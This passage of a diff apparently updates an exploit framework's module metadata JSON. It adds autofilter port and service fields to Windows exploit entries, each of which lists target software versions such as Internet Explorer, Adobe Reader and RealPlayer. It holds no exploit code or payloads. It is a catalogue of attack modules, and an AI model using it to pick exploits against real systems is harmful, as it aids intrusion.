+ ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3 with msvcrt ROP", @@ -67172,6 +88533,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3 with msvcrt ROP", @@ -67209,6 +88576,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3" @@ -67251,6 +88624,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86/x64" ], @@ -67289,6 +88668,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 on Windows 7 SP1" ], @@ -67326,6 +88711,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 8 on Windows XP SP3", @@ -67365,6 +88756,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67400,6 +88797,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 on Windows XP SP3" ], @@ -67436,6 +88839,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -67475,6 +88884,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP with IE 8" ], @@ -67512,6 +88927,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1 / IE 10 / FP 12" ], @@ -67545,6 +88966,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67588,6 +89015,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP", "Windows 7" @@ -67622,6 +89055,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 10 with IE 11" @@ -67659,6 +89098,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -67692,6 +89137,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67732,6 +89183,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67774,6 +89231,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 Pro English (IE6)" ], @@ -67807,6 +89270,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67840,6 +89309,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -67879,6 +89354,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -67915,6 +89396,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -67956,6 +89443,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -67990,6 +89483,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iPrint 5.30 Windows Client" ], @@ -68023,6 +89522,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68057,6 +89562,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68090,6 +89601,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68127,6 +89644,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68161,6 +89684,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iPrint 5.30 Windows Client" ], @@ -68196,6 +89725,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68238,6 +89773,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68278,6 +89819,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68316,6 +89863,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68352,6 +89905,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68385,6 +89944,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-SP2" ], @@ -68420,6 +89985,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VMWare OVF Tools 2.1 on Windows XP SP3" ], @@ -68456,6 +90027,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Internet Explorer 6 / Internet Explorer 7" ], @@ -68488,6 +90065,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68524,6 +90107,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68564,6 +90153,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -68600,6 +90195,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RealPlayer SP 1.0 - 1.1.4 Universal", "RealPlayer 11.0 - 11.1 Universal" @@ -68635,6 +90236,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -68668,6 +90275,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE / RealOne Player 2 (6.0.11.853)", "IE / RealPlayer 10.5 (6.0.12.1483)" @@ -68705,6 +90318,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -68740,6 +90359,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RealPlayer 10/8 on Windows 2000 SP0-SP4 English", "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" @@ -68774,6 +90399,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" ], @@ -68807,6 +90438,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -68842,6 +90479,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68876,6 +90519,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Samsung Security Manager 1.32 & 1.4 Universal" ], @@ -68909,6 +90558,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -68942,6 +90597,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -68983,6 +90644,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69016,6 +90683,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 6 / Windows XP SP2 Pro English" ], @@ -69049,6 +90722,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69082,6 +90761,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69114,6 +90799,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69148,6 +90839,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" ], @@ -69183,6 +90880,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "Windows XP SP2 Universal", @@ -69219,6 +90922,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 7 on Windows XP SP3", @@ -69254,6 +90963,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69287,6 +91002,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP0-SP3 (IE6/IE7)", @@ -69326,6 +91047,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -69364,6 +91091,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69397,6 +91130,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -69430,6 +91169,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal vcst_eu.dll", "Windows 2000 Pro English", @@ -69469,6 +91214,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69503,6 +91254,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6 on Windows XP SP3", @@ -69541,6 +91298,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -69575,6 +91338,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -69610,6 +91379,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows IE6-7", @@ -69646,6 +91421,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -69686,6 +91467,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Internet Explorer 6 on XP SP3", @@ -69722,6 +91509,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69764,6 +91557,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -69800,6 +91599,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -69834,6 +91639,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.12 Universal" ], @@ -69867,6 +91678,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winamp 5.24" ], @@ -69900,6 +91717,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English ALL", "Windows XP Pro SP0/SP1 English" @@ -69934,6 +91757,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" ], @@ -69972,6 +91801,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows Universal", @@ -70007,6 +91842,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70041,6 +91882,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English SP4", "Windows XP Pro SP2 English" @@ -70076,6 +91923,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 Pro English" ], @@ -70108,6 +91961,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0/SP1 Pro English", "Windows 2000 Pro English All" @@ -70142,6 +92001,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70178,6 +92043,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -70214,6 +92085,12 @@ "platform": "Windows", "arch": "", "rport": 135, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT SP3-6a/2000/XP/2003 Universal" ], @@ -70248,6 +92125,12 @@ "platform": "Windows", "arch": "", "rport": 2103, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 ALL / Windows XP SP0-SP1 (English)" ], @@ -70283,6 +92166,12 @@ "platform": "Windows", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)", "Windows 2000 Server SP0-SP4+ English", @@ -70326,6 +92215,12 @@ "platform": "Windows", "arch": "", "rport": 2103, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Server English" ], @@ -70363,6 +92258,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Windows XP SP2 user32.dll 5.1.2600.2622", @@ -70409,6 +92316,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -70444,6 +92363,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic" ], @@ -70477,6 +92408,12 @@ "platform": "Windows", "arch": "", "rport": 41025, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC AlphaStor 3.1" ], @@ -70513,6 +92450,12 @@ "platform": "Windows", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC AlphaStor 4.0 < build 800 / Windows Universal" ], @@ -70549,6 +92492,12 @@ "platform": "Windows", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC Networker 7.6 SP3 / Windows Universal", "EMC Networker 7.6 SP3 / Windows XP SP3", @@ -70587,6 +92536,12 @@ "platform": "Windows", "arch": "x86", "rport": 6542, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "EMC Replication Manager 5.2.1 / Windows Native Payload" ], @@ -70622,6 +92577,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -70655,6 +92616,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" ], @@ -70689,6 +92656,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ACDSee FotoSlate 4.0 Build 146" ], @@ -70722,6 +92695,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ACDSee 9.0 (Build 1008)" ], @@ -70757,6 +92736,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1" ], @@ -70789,6 +92774,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" ], @@ -70822,6 +92813,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)" ], @@ -70858,6 +92855,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70896,6 +92899,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70932,6 +92941,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -70968,6 +92983,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -71003,6 +93024,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Universal (JS Heap Spray)" ], @@ -71038,6 +93065,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71074,6 +93107,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v9.0.0 (Windows XP SP3 English)", "Adobe Reader v8.1.2 (Windows XP SP2 English)" @@ -71113,6 +93152,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)" ], @@ -71149,6 +93194,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows English (JS Heap Spray)", "Adobe Reader Windows German (JS Heap Spray)" @@ -71187,6 +93238,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)" ], @@ -71223,6 +93280,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader <= v9.3.3 (Windows XP SP3 English)" ], @@ -71263,6 +93326,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3" ], @@ -71301,6 +93370,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / Adobe Reader 9/10/11" ], @@ -71335,6 +93410,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)" ], @@ -71368,6 +93449,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader v8.1.2 (Windows XP SP3 English)" ], @@ -71409,6 +93496,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ " ALLPlayer 2.8.1 / Windows 7 SP1" ], @@ -71443,6 +93536,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal Salamander 2.5" ], @@ -71479,6 +93578,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AOL Desktop 9.6 on Windows XP SP3", "AOL Desktop 9.6 on Windows XP SP3 - NX bypass", @@ -71514,6 +93619,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" ], @@ -71549,6 +93660,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 with DEP bypass" ], @@ -71587,6 +93704,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" ], @@ -71625,6 +93748,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "QuickTime 7.7.1 on Windows XP SP3", "QuickTime 7.7.0 on Windows XP SP3", @@ -71661,6 +93790,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" ], @@ -71695,6 +93830,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71729,6 +93870,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71760,6 +93907,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -71793,6 +93946,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Aviosoft DTV Player 1.0.1.2" ], @@ -71828,6 +93987,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English", "Windows 2000 SP4 English" @@ -71862,10 +94027,16 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" ], - "mod_time": "2017-09-13 22:03:34 +0000", + "mod_time": "2018-10-05 02:10:42 +0000", "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", "is_install_path": true, "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", @@ -71896,6 +94067,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BlazeVideo HDTV Player Pro v6.6.0.3" ], @@ -71933,6 +94110,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BlazeDVD 6.2", "BlazeDVD 5.1" @@ -71967,6 +94150,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Boxoft WAV to MP3 Converter v1.1" ], @@ -72002,6 +94191,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -72035,6 +94230,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP", "Windows 7" @@ -72070,6 +94271,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" ], @@ -72104,6 +94311,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2 English", "Windows XP SP0/1 English", @@ -72139,6 +94352,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CCMPlayer 1.5" ], @@ -72177,6 +94396,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" ], @@ -72213,6 +94438,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" ], @@ -72248,6 +94479,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Corel PDF Fusion 1.11 / Windows XP SP3" ], @@ -72284,6 +94521,12 @@ "platform": "Windows", "arch": 